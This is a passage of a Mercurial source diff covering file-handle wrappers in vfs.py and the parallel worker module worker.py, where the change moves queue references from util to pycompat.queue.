471 proxyvfs.__init__(self, vfs)
472 self._filter = filter
472 self._filter = filter
473
473
474 def __call__(self, path, *args, **kwargs):
474 def __call__(self, path, *args, **kwargs):
475 return self.vfs(self._filter(path), *args, **kwargs)
475 return self.vfs(self._filter(path), *args, **kwargs)
476
476
477 def join(self, path, *insidef):
477 def join(self, path, *insidef):
478 if path:
478 if path:
479 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
479 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
480 else:
480 else:
481 return self.vfs.join(path)
481 return self.vfs.join(path)
482
482
483 filteropener = filtervfs
483 filteropener = filtervfs
484
484
485 class readonlyvfs(abstractvfs, proxyvfs):
485 class readonlyvfs(abstractvfs, proxyvfs):
486 '''Wrapper vfs preventing any writing.'''
486 '''Wrapper vfs preventing any writing.'''
487
487
488 def __init__(self, vfs):
488 def __init__(self, vfs):
489 proxyvfs.__init__(self, vfs)
489 proxyvfs.__init__(self, vfs)
490
490
491 def __call__(self, path, mode='r', *args, **kw):
491 def __call__(self, path, mode='r', *args, **kw):
492 if mode not in ('r', 'rb'):
492 if mode not in ('r', 'rb'):
493 raise error.Abort(_('this vfs is read only'))
493 raise error.Abort(_('this vfs is read only'))
494 return self.vfs(path, mode, *args, **kw)
494 return self.vfs(path, mode, *args, **kw)
495
495
496 def join(self, path, *insidef):
496 def join(self, path, *insidef):
497 return self.vfs.join(path, *insidef)
497 return self.vfs.join(path, *insidef)
498
498
499 class closewrapbase(object):
499 class closewrapbase(object):
500 """Base class of wrapper, which hooks closing
500 """Base class of wrapper, which hooks closing
501
501
502 Do not instantiate outside of the vfs layer.
502 Do not instantiate outside of the vfs layer.
503 """
503 """
504 def __init__(self, fh):
504 def __init__(self, fh):
505 object.__setattr__(self, r'_origfh', fh)
505 object.__setattr__(self, r'_origfh', fh)
506
506
507 def __getattr__(self, attr):
507 def __getattr__(self, attr):
508 return getattr(self._origfh, attr)
508 return getattr(self._origfh, attr)
509
509
510 def __setattr__(self, attr, value):
510 def __setattr__(self, attr, value):
511 return setattr(self._origfh, attr, value)
511 return setattr(self._origfh, attr, value)
512
512
513 def __delattr__(self, attr):
513 def __delattr__(self, attr):
514 return delattr(self._origfh, attr)
514 return delattr(self._origfh, attr)
515
515
516 def __enter__(self):
516 def __enter__(self):
517 return self._origfh.__enter__()
517 return self._origfh.__enter__()
518
518
519 def __exit__(self, exc_type, exc_value, exc_tb):
519 def __exit__(self, exc_type, exc_value, exc_tb):
520 raise NotImplementedError('attempted instantiating ' + str(type(self)))
520 raise NotImplementedError('attempted instantiating ' + str(type(self)))
521
521
522 def close(self):
522 def close(self):
523 raise NotImplementedError('attempted instantiating ' + str(type(self)))
523 raise NotImplementedError('attempted instantiating ' + str(type(self)))
524
524
525 class delayclosedfile(closewrapbase):
525 class delayclosedfile(closewrapbase):
526 """Proxy for a file object whose close is delayed.
526 """Proxy for a file object whose close is delayed.
527
527
528 Do not instantiate outside of the vfs layer.
528 Do not instantiate outside of the vfs layer.
529 """
529 """
530 def __init__(self, fh, closer):
530 def __init__(self, fh, closer):
531 super(delayclosedfile, self).__init__(fh)
531 super(delayclosedfile, self).__init__(fh)
532 object.__setattr__(self, r'_closer', closer)
532 object.__setattr__(self, r'_closer', closer)
533
533
534 def __exit__(self, exc_type, exc_value, exc_tb):
534 def __exit__(self, exc_type, exc_value, exc_tb):
535 self._closer.close(self._origfh)
535 self._closer.close(self._origfh)
536
536
537 def close(self):
537 def close(self):
538 self._closer.close(self._origfh)
538 self._closer.close(self._origfh)
539
539
540 class backgroundfilecloser(object):
540 class backgroundfilecloser(object):
541 """Coordinates background closing of file handles on multiple threads."""
541 """Coordinates background closing of file handles on multiple threads."""
542 def __init__(self, ui, expectedcount=-1):
542 def __init__(self, ui, expectedcount=-1):
543 self._running = False
543 self._running = False
544 self._entered = False
544 self._entered = False
545 self._threads = []
545 self._threads = []
546 self._threadexception = None
546 self._threadexception = None
547
547
548 # Only Windows/NTFS has slow file closing. So only enable by default
548 # Only Windows/NTFS has slow file closing. So only enable by default
549 # on that platform. But allow to be enabled elsewhere for testing.
549 # on that platform. But allow to be enabled elsewhere for testing.
550 defaultenabled = pycompat.iswindows
550 defaultenabled = pycompat.iswindows
551 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
551 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
552
552
553 if not enabled:
553 if not enabled:
554 return
554 return
555
555
556 # There is overhead to starting and stopping the background threads.
556 # There is overhead to starting and stopping the background threads.
557 # Don't do background processing unless the file count is large enough
557 # Don't do background processing unless the file count is large enough
558 # to justify it.
558 # to justify it.
559 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
559 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
560 # FUTURE dynamically start background threads after minfilecount closes.
560 # FUTURE dynamically start background threads after minfilecount closes.
561 # (We don't currently have any callers that don't know their file count)
561 # (We don't currently have any callers that don't know their file count)
562 if expectedcount > 0 and expectedcount < minfilecount:
562 if expectedcount > 0 and expectedcount < minfilecount:
563 return
563 return
564
564
565 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
565 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
566 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
566 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
567
567
568 ui.debug('starting %d threads for background file closing\n' %
568 ui.debug('starting %d threads for background file closing\n' %
569 threadcount)
569 threadcount)
570
570
571 self._queue = util.queue(maxsize=maxqueue)
571 self._queue = pycompat.queue.Queue(maxsize=maxqueue)
572 self._running = True
572 self._running = True
573
573
574 for i in range(threadcount):
574 for i in range(threadcount):
575 t = threading.Thread(target=self._worker, name='backgroundcloser')
575 t = threading.Thread(target=self._worker, name='backgroundcloser')
576 self._threads.append(t)
576 self._threads.append(t)
577 t.start()
577 t.start()
578
578
579 def __enter__(self):
579 def __enter__(self):
580 self._entered = True
580 self._entered = True
581 return self
581 return self
582
582
583 def __exit__(self, exc_type, exc_value, exc_tb):
583 def __exit__(self, exc_type, exc_value, exc_tb):
584 self._running = False
584 self._running = False
585
585
586 # Wait for threads to finish closing so open files don't linger for
586 # Wait for threads to finish closing so open files don't linger for
587 # longer than lifetime of context manager.
587 # longer than lifetime of context manager.
588 for t in self._threads:
588 for t in self._threads:
589 t.join()
589 t.join()
590
590
591 def _worker(self):
591 def _worker(self):
592 """Main routine for worker thread."""
592 """Main routine for worker thread."""
593 while True:
593 while True:
594 try:
594 try:
595 fh = self._queue.get(block=True, timeout=0.100)
595 fh = self._queue.get(block=True, timeout=0.100)
596 # Need to catch or the thread will terminate and
596 # Need to catch or the thread will terminate and
597 # we could orphan file descriptors.
597 # we could orphan file descriptors.
598 try:
598 try:
599 fh.close()
599 fh.close()
600 except Exception as e:
600 except Exception as e:
601 # Stash so can re-raise from main thread later.
601 # Stash so can re-raise from main thread later.
602 self._threadexception = e
602 self._threadexception = e
603 except util.empty:
603 except pycompat.queue.Empty:
604 if not self._running:
604 if not self._running:
605 break
605 break
606
606
607 def close(self, fh):
607 def close(self, fh):
608 """Schedule a file for closing."""
608 """Schedule a file for closing."""
609 if not self._entered:
609 if not self._entered:
610 raise error.Abort(_('can only call close() when context manager '
610 raise error.Abort(_('can only call close() when context manager '
611 'active'))
611 'active'))
612
612
613 # If a background thread encountered an exception, raise now so we fail
613 # If a background thread encountered an exception, raise now so we fail
614 # fast. Otherwise we may potentially go on for minutes until the error
614 # fast. Otherwise we may potentially go on for minutes until the error
615 # is acted on.
615 # is acted on.
616 if self._threadexception:
616 if self._threadexception:
617 e = self._threadexception
617 e = self._threadexception
618 self._threadexception = None
618 self._threadexception = None
619 raise e
619 raise e
620
620
621 # If we're not actively running, close synchronously.
621 # If we're not actively running, close synchronously.
622 if not self._running:
622 if not self._running:
623 fh.close()
623 fh.close()
624 return
624 return
625
625
626 self._queue.put(fh, block=True, timeout=None)
626 self._queue.put(fh, block=True, timeout=None)
627
627
628 class checkambigatclosing(closewrapbase):
628 class checkambigatclosing(closewrapbase):
629 """Proxy for a file object, to avoid ambiguity of file stat
629 """Proxy for a file object, to avoid ambiguity of file stat
630
630
631 See also util.filestat for detail about "ambiguity of file stat".
631 See also util.filestat for detail about "ambiguity of file stat".
632
632
633 This proxy is useful only if the target file is guarded by any
633 This proxy is useful only if the target file is guarded by any
634 lock (e.g. repo.lock or repo.wlock)
634 lock (e.g. repo.lock or repo.wlock)
635
635
636 Do not instantiate outside of the vfs layer.
636 Do not instantiate outside of the vfs layer.
637 """
637 """
638 def __init__(self, fh):
638 def __init__(self, fh):
639 super(checkambigatclosing, self).__init__(fh)
639 super(checkambigatclosing, self).__init__(fh)
640 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
640 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
641
641
642 def _checkambig(self):
642 def _checkambig(self):
643 oldstat = self._oldstat
643 oldstat = self._oldstat
644 if oldstat.stat:
644 if oldstat.stat:
645 _avoidambig(self._origfh.name, oldstat)
645 _avoidambig(self._origfh.name, oldstat)
646
646
647 def __exit__(self, exc_type, exc_value, exc_tb):
647 def __exit__(self, exc_type, exc_value, exc_tb):
648 self._origfh.__exit__(exc_type, exc_value, exc_tb)
648 self._origfh.__exit__(exc_type, exc_value, exc_tb)
649 self._checkambig()
649 self._checkambig()
650
650
651 def close(self):
651 def close(self):
652 self._origfh.close()
652 self._origfh.close()
653 self._checkambig()
653 self._checkambig()
@@ -1,327 +1,327 b''
1 # worker.py - master-slave parallelism support
1 # worker.py - master-slave parallelism support
2 #
2 #
3 # Copyright 2013 Facebook, Inc.
3 # Copyright 2013 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import os
11 import os
12 import signal
12 import signal
13 import sys
13 import sys
14 import threading
14 import threading
15 import time
15 import time
16
16
17 from .i18n import _
17 from .i18n import _
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 error,
21 pycompat,
21 pycompat,
22 scmutil,
22 scmutil,
23 util,
23 util,
24 )
24 )
25
25
26 def countcpus():
26 def countcpus():
27 '''try to count the number of CPUs on the system'''
27 '''try to count the number of CPUs on the system'''
28
28
29 # posix
29 # posix
30 try:
30 try:
31 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
31 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
32 if n > 0:
32 if n > 0:
33 return n
33 return n
34 except (AttributeError, ValueError):
34 except (AttributeError, ValueError):
35 pass
35 pass
36
36
37 # windows
37 # windows
38 try:
38 try:
39 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
39 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
40 if n > 0:
40 if n > 0:
41 return n
41 return n
42 except (KeyError, ValueError):
42 except (KeyError, ValueError):
43 pass
43 pass
44
44
45 return 1
45 return 1
46
46
47 def _numworkers(ui):
47 def _numworkers(ui):
48 s = ui.config('worker', 'numcpus')
48 s = ui.config('worker', 'numcpus')
49 if s:
49 if s:
50 try:
50 try:
51 n = int(s)
51 n = int(s)
52 if n >= 1:
52 if n >= 1:
53 return n
53 return n
54 except ValueError:
54 except ValueError:
55 raise error.Abort(_('number of cpus must be an integer'))
55 raise error.Abort(_('number of cpus must be an integer'))
56 return min(max(countcpus(), 4), 32)
56 return min(max(countcpus(), 4), 32)
57
57
58 if pycompat.isposix or pycompat.iswindows:
58 if pycompat.isposix or pycompat.iswindows:
59 _startupcost = 0.01
59 _startupcost = 0.01
60 else:
60 else:
61 _startupcost = 1e30
61 _startupcost = 1e30
62
62
63 def worthwhile(ui, costperop, nops):
63 def worthwhile(ui, costperop, nops):
64 '''try to determine whether the benefit of multiple processes can
64 '''try to determine whether the benefit of multiple processes can
65 outweigh the cost of starting them'''
65 outweigh the cost of starting them'''
66 linear = costperop * nops
66 linear = costperop * nops
67 workers = _numworkers(ui)
67 workers = _numworkers(ui)
68 benefit = linear - (_startupcost * workers + linear / workers)
68 benefit = linear - (_startupcost * workers + linear / workers)
69 return benefit >= 0.15
69 return benefit >= 0.15
70
70
71 def worker(ui, costperarg, func, staticargs, args):
71 def worker(ui, costperarg, func, staticargs, args):
72 '''run a function, possibly in parallel in multiple worker
72 '''run a function, possibly in parallel in multiple worker
73 processes.
73 processes.
74
74
75 returns a progress iterator
75 returns a progress iterator
76
76
77 costperarg - cost of a single task
77 costperarg - cost of a single task
78
78
79 func - function to run
79 func - function to run
80
80
81 staticargs - arguments to pass to every invocation of the function
81 staticargs - arguments to pass to every invocation of the function
82
82
83 args - arguments to split into chunks, to pass to individual
83 args - arguments to split into chunks, to pass to individual
84 workers
84 workers
85 '''
85 '''
86 enabled = ui.configbool('worker', 'enabled')
86 enabled = ui.configbool('worker', 'enabled')
87 if enabled and worthwhile(ui, costperarg, len(args)):
87 if enabled and worthwhile(ui, costperarg, len(args)):
88 return _platformworker(ui, func, staticargs, args)
88 return _platformworker(ui, func, staticargs, args)
89 return func(*staticargs + (args,))
89 return func(*staticargs + (args,))
90
90
91 def _posixworker(ui, func, staticargs, args):
91 def _posixworker(ui, func, staticargs, args):
92 rfd, wfd = os.pipe()
92 rfd, wfd = os.pipe()
93 workers = _numworkers(ui)
93 workers = _numworkers(ui)
94 oldhandler = signal.getsignal(signal.SIGINT)
94 oldhandler = signal.getsignal(signal.SIGINT)
95 signal.signal(signal.SIGINT, signal.SIG_IGN)
95 signal.signal(signal.SIGINT, signal.SIG_IGN)
96 pids, problem = set(), [0]
96 pids, problem = set(), [0]
97 def killworkers():
97 def killworkers():
98 # unregister SIGCHLD handler as all children will be killed. This
98 # unregister SIGCHLD handler as all children will be killed. This
99 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
99 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
100 # could be updated while iterating, which would cause inconsistency.
100 # could be updated while iterating, which would cause inconsistency.
101 signal.signal(signal.SIGCHLD, oldchldhandler)
101 signal.signal(signal.SIGCHLD, oldchldhandler)
102 # if one worker bails, there's no good reason to wait for the rest
102 # if one worker bails, there's no good reason to wait for the rest
103 for p in pids:
103 for p in pids:
104 try:
104 try:
105 os.kill(p, signal.SIGTERM)
105 os.kill(p, signal.SIGTERM)
106 except OSError as err:
106 except OSError as err:
107 if err.errno != errno.ESRCH:
107 if err.errno != errno.ESRCH:
108 raise
108 raise
109 def waitforworkers(blocking=True):
109 def waitforworkers(blocking=True):
110 for pid in pids.copy():
110 for pid in pids.copy():
111 p = st = 0
111 p = st = 0
112 while True:
112 while True:
113 try:
113 try:
114 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
114 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
115 break
115 break
116 except OSError as e:
116 except OSError as e:
117 if e.errno == errno.EINTR:
117 if e.errno == errno.EINTR:
118 continue
118 continue
119 elif e.errno == errno.ECHILD:
119 elif e.errno == errno.ECHILD:
120 # child would already be reaped, but pids yet been
120 # child would already be reaped, but pids yet been
121 # updated (maybe interrupted just after waitpid)
121 # updated (maybe interrupted just after waitpid)
122 pids.discard(pid)
122 pids.discard(pid)
123 break
123 break
124 else:
124 else:
125 raise
125 raise
126 if not p:
126 if not p:
127 # skip subsequent steps, because child process should
127 # skip subsequent steps, because child process should
128 # be still running in this case
128 # be still running in this case
129 continue
129 continue
130 pids.discard(p)
130 pids.discard(p)
131 st = _exitstatus(st)
131 st = _exitstatus(st)
132 if st and not problem[0]:
132 if st and not problem[0]:
133 problem[0] = st
133 problem[0] = st
134 def sigchldhandler(signum, frame):
134 def sigchldhandler(signum, frame):
135 waitforworkers(blocking=False)
135 waitforworkers(blocking=False)
136 if problem[0]:
136 if problem[0]:
137 killworkers()
137 killworkers()
138 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
138 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
139 ui.flush()
139 ui.flush()
140 parentpid = os.getpid()
140 parentpid = os.getpid()
141 for pargs in partition(args, workers):
141 for pargs in partition(args, workers):
142 # make sure we use os._exit in all worker code paths. otherwise the
142 # make sure we use os._exit in all worker code paths. otherwise the
143 # worker may do some clean-ups which could cause surprises like
143 # worker may do some clean-ups which could cause surprises like
144 # deadlock. see sshpeer.cleanup for example.
144 # deadlock. see sshpeer.cleanup for example.
145 # override error handling *before* fork. this is necessary because
145 # override error handling *before* fork. this is necessary because
146 # exception (signal) may arrive after fork, before "pid =" assignment
146 # exception (signal) may arrive after fork, before "pid =" assignment
147 # completes, and other exception handler (dispatch.py) can lead to
147 # completes, and other exception handler (dispatch.py) can lead to
148 # unexpected code path without os._exit.
148 # unexpected code path without os._exit.
149 ret = -1
149 ret = -1
150 try:
150 try:
151 pid = os.fork()
151 pid = os.fork()
152 if pid == 0:
152 if pid == 0:
153 signal.signal(signal.SIGINT, oldhandler)
153 signal.signal(signal.SIGINT, oldhandler)
154 signal.signal(signal.SIGCHLD, oldchldhandler)
154 signal.signal(signal.SIGCHLD, oldchldhandler)
155
155
156 def workerfunc():
156 def workerfunc():
157 os.close(rfd)
157 os.close(rfd)
158 for i, item in func(*(staticargs + (pargs,))):
158 for i, item in func(*(staticargs + (pargs,))):
159 os.write(wfd, '%d %s\n' % (i, item))
159 os.write(wfd, '%d %s\n' % (i, item))
160 return 0
160 return 0
161
161
162 ret = scmutil.callcatch(ui, workerfunc)
162 ret = scmutil.callcatch(ui, workerfunc)
163 except: # parent re-raises, child never returns
163 except: # parent re-raises, child never returns
164 if os.getpid() == parentpid:
164 if os.getpid() == parentpid:
165 raise
165 raise
166 exctype = sys.exc_info()[0]
166 exctype = sys.exc_info()[0]
167 force = not issubclass(exctype, KeyboardInterrupt)
167 force = not issubclass(exctype, KeyboardInterrupt)
168 ui.traceback(force=force)
168 ui.traceback(force=force)
169 finally:
169 finally:
170 if os.getpid() != parentpid:
170 if os.getpid() != parentpid:
171 try:
171 try:
172 ui.flush()
172 ui.flush()
173 except: # never returns, no re-raises
173 except: # never returns, no re-raises
174 pass
174 pass
175 finally:
175 finally:
176 os._exit(ret & 255)
176 os._exit(ret & 255)
177 pids.add(pid)
177 pids.add(pid)
178 os.close(wfd)
178 os.close(wfd)
179 fp = os.fdopen(rfd, r'rb', 0)
179 fp = os.fdopen(rfd, r'rb', 0)
180 def cleanup():
180 def cleanup():
181 signal.signal(signal.SIGINT, oldhandler)
181 signal.signal(signal.SIGINT, oldhandler)
182 waitforworkers()
182 waitforworkers()
183 signal.signal(signal.SIGCHLD, oldchldhandler)
183 signal.signal(signal.SIGCHLD, oldchldhandler)
184 status = problem[0]
184 status = problem[0]
185 if status:
185 if status:
186 if status < 0:
186 if status < 0:
187 os.kill(os.getpid(), -status)
187 os.kill(os.getpid(), -status)
188 sys.exit(status)
188 sys.exit(status)
189 try:
189 try:
190 for line in util.iterfile(fp):
190 for line in util.iterfile(fp):
191 l = line.split(' ', 1)
191 l = line.split(' ', 1)
192 yield int(l[0]), l[1][:-1]
192 yield int(l[0]), l[1][:-1]
193 except: # re-raises
193 except: # re-raises
194 killworkers()
194 killworkers()
195 cleanup()
195 cleanup()
196 raise
196 raise
197 cleanup()
197 cleanup()
198
198
199 def _posixexitstatus(code):
199 def _posixexitstatus(code):
200 '''convert a posix exit status into the same form returned by
200 '''convert a posix exit status into the same form returned by
201 os.spawnv
201 os.spawnv
202
202
203 returns None if the process was stopped instead of exiting'''
203 returns None if the process was stopped instead of exiting'''
204 if os.WIFEXITED(code):
204 if os.WIFEXITED(code):
205 return os.WEXITSTATUS(code)
205 return os.WEXITSTATUS(code)
206 elif os.WIFSIGNALED(code):
206 elif os.WIFSIGNALED(code):
207 return -os.WTERMSIG(code)
207 return -os.WTERMSIG(code)
208
208
209 def _windowsworker(ui, func, staticargs, args):
209 def _windowsworker(ui, func, staticargs, args):
210 class Worker(threading.Thread):
210 class Worker(threading.Thread):
211 def __init__(self, taskqueue, resultqueue, func, staticargs,
211 def __init__(self, taskqueue, resultqueue, func, staticargs,
212 group=None, target=None, name=None, verbose=None):
212 group=None, target=None, name=None, verbose=None):
213 threading.Thread.__init__(self, group=group, target=target,
213 threading.Thread.__init__(self, group=group, target=target,
214 name=name, verbose=verbose)
214 name=name, verbose=verbose)
215 self._taskqueue = taskqueue
215 self._taskqueue = taskqueue
216 self._resultqueue = resultqueue
216 self._resultqueue = resultqueue
217 self._func = func
217 self._func = func
218 self._staticargs = staticargs
218 self._staticargs = staticargs
219 self._interrupted = False
219 self._interrupted = False
220 self.daemon = True
220 self.daemon = True
221 self.exception = None
221 self.exception = None
222
222
223 def interrupt(self):
223 def interrupt(self):
224 self._interrupted = True
224 self._interrupted = True
225
225
226 def run(self):
226 def run(self):
227 try:
227 try:
228 while not self._taskqueue.empty():
228 while not self._taskqueue.empty():
229 try:
229 try:
230 args = self._taskqueue.get_nowait()
230 args = self._taskqueue.get_nowait()
231 for res in self._func(*self._staticargs + (args,)):
231 for res in self._func(*self._staticargs + (args,)):
232 self._resultqueue.put(res)
232 self._resultqueue.put(res)
233 # threading doesn't provide a native way to
233 # threading doesn't provide a native way to
234 # interrupt execution. handle it manually at every
234 # interrupt execution. handle it manually at every
235 # iteration.
235 # iteration.
236 if self._interrupted:
236 if self._interrupted:
237 return
237 return
238 except util.empty:
238 except pycompat.queue.Empty:
239 break
239 break
240 except Exception as e:
240 except Exception as e:
241 # store the exception such that the main thread can resurface
241 # store the exception such that the main thread can resurface
242 # it as if the func was running without workers.
242 # it as if the func was running without workers.
243 self.exception = e
243 self.exception = e
244 raise
244 raise
245
245
246 threads = []
246 threads = []
247 def trykillworkers():
247 def trykillworkers():
248 # Allow up to 1 second to clean worker threads nicely
248 # Allow up to 1 second to clean worker threads nicely
249 cleanupend = time.time() + 1
249 cleanupend = time.time() + 1
250 for t in threads:
250 for t in threads:
251 t.interrupt()
251 t.interrupt()
252 for t in threads:
252 for t in threads:
253 remainingtime = cleanupend - time.time()
253 remainingtime = cleanupend - time.time()
254 t.join(remainingtime)
254 t.join(remainingtime)
255 if t.is_alive():
255 if t.is_alive():
256 # pass over the workers joining failure. it is more
256 # pass over the workers joining failure. it is more
257 # important to surface the inital exception than the
257 # important to surface the inital exception than the
258 # fact that one of workers may be processing a large
258 # fact that one of workers may be processing a large
259 # task and does not get to handle the interruption.
259 # task and does not get to handle the interruption.
260 ui.warn(_("failed to kill worker threads while "
260 ui.warn(_("failed to kill worker threads while "
261 "handling an exception\n"))
261 "handling an exception\n"))
262 return
262 return
263
263
264 workers = _numworkers(ui)
264 workers = _numworkers(ui)
265 resultqueue = util.queue()
265 resultqueue = pycompat.queue.Queue()
266 taskqueue = util.queue()
266 taskqueue = pycompat.queue.Queue()
267 # partition work to more pieces than workers to minimize the chance
267 # partition work to more pieces than workers to minimize the chance
268 # of uneven distribution of large tasks between the workers
268 # of uneven distribution of large tasks between the workers
269 for pargs in partition(args, workers * 20):
269 for pargs in partition(args, workers * 20):
270 taskqueue.put(pargs)
270 taskqueue.put(pargs)
271 for _i in range(workers):
271 for _i in range(workers):
272 t = Worker(taskqueue, resultqueue, func, staticargs)
272 t = Worker(taskqueue, resultqueue, func, staticargs)
273 threads.append(t)
273 threads.append(t)
274 t.start()
274 t.start()
275 try:
275 try:
276 while len(threads) > 0:
276 while len(threads) > 0:
277 while not resultqueue.empty():
277 while not resultqueue.empty():
278 yield resultqueue.get()
278 yield resultqueue.get()
279 threads[0].join(0.05)
279 threads[0].join(0.05)
280 finishedthreads = [_t for _t in threads if not _t.is_alive()]
280 finishedthreads = [_t for _t in threads if not _t.is_alive()]
281 for t in finishedthreads:
281 for t in finishedthreads:
282 if t.exception is not None:
282 if t.exception is not None:
283 raise t.exception
283 raise t.exception
284 threads.remove(t)
284 threads.remove(t)
285 except (Exception, KeyboardInterrupt): # re-raises
285 except (Exception, KeyboardInterrupt): # re-raises
286 trykillworkers()
286 trykillworkers()
287 raise
287 raise
288 while not resultqueue.empty():
288 while not resultqueue.empty():
289 yield resultqueue.get()
289 yield resultqueue.get()
290
290
291 if pycompat.iswindows:
291 if pycompat.iswindows:
292 _platformworker = _windowsworker
292 _platformworker = _windowsworker
293 else:
293 else:
294 _platformworker = _posixworker
294 _platformworker = _posixworker
295 _exitstatus = _posixexitstatus
295 _exitstatus = _posixexitstatus
296
296
297 def partition(lst, nslices):
297 def partition(lst, nslices):
298 '''partition a list into N slices of roughly equal size
298 '''partition a list into N slices of roughly equal size
299
299
300 The current strategy takes every Nth element from the input. If
300 The current strategy takes every Nth element from the input. If
301 we ever write workers that need to preserve grouping in input
301 we ever write workers that need to preserve grouping in input
302 we should consider allowing callers to specify a partition strategy.
302 we should consider allowing callers to specify a partition strategy.
303
303
304 mpm is not a fan of this partitioning strategy when files are involved.
304 mpm is not a fan of this partitioning strategy when files are involved.
305 In his words:
305 In his words:
306
306
307 Single-threaded Mercurial makes a point of creating and visiting
307 Single-threaded Mercurial makes a point of creating and visiting
308 files in a fixed order (alphabetical). When creating files in order,
308 files in a fixed order (alphabetical). When creating files in order,
309 a typical filesystem is likely to allocate them on nearby regions on
309 a typical filesystem is likely to allocate them on nearby regions on
310 disk. Thus, when revisiting in the same order, locality is maximized
310 disk. Thus, when revisiting in the same order, locality is maximized
311 and various forms of OS and disk-level caching and read-ahead get a
311 and various forms of OS and disk-level caching and read-ahead get a
312 chance to work.
312 chance to work.
313
313
314 This effect can be quite significant on spinning disks. I discovered it
314 This effect can be quite significant on spinning disks. I discovered it
315 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
315 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
316 Tarring a repo and copying it to another disk effectively randomized
316 Tarring a repo and copying it to another disk effectively randomized
317 the revlog ordering on disk by sorting the revlogs by hash and suddenly
317 the revlog ordering on disk by sorting the revlogs by hash and suddenly
318 performance of my kernel checkout benchmark dropped by ~10x because the
318 performance of my kernel checkout benchmark dropped by ~10x because the
319 "working set" of sectors visited no longer fit in the drive's cache and
319 "working set" of sectors visited no longer fit in the drive's cache and
320 the workload switched from streaming to random I/O.
320 the workload switched from streaming to random I/O.
321
321
322 What we should really be doing is have workers read filenames from a
322 What we should really be doing is have workers read filenames from a
323 ordered queue. This preserves locality and also keeps any worker from
323 ordered queue. This preserves locality and also keeps any worker from
324 getting more than one file out of balance.
324 getting more than one file out of balance.
325 '''
325 '''
326 for i in range(nslices):
326 for i in range(nslices):
327 yield lst[i::nslices]
327 yield lst[i::nslices]
General Comments 0
You need to be logged in to leave comments. Login now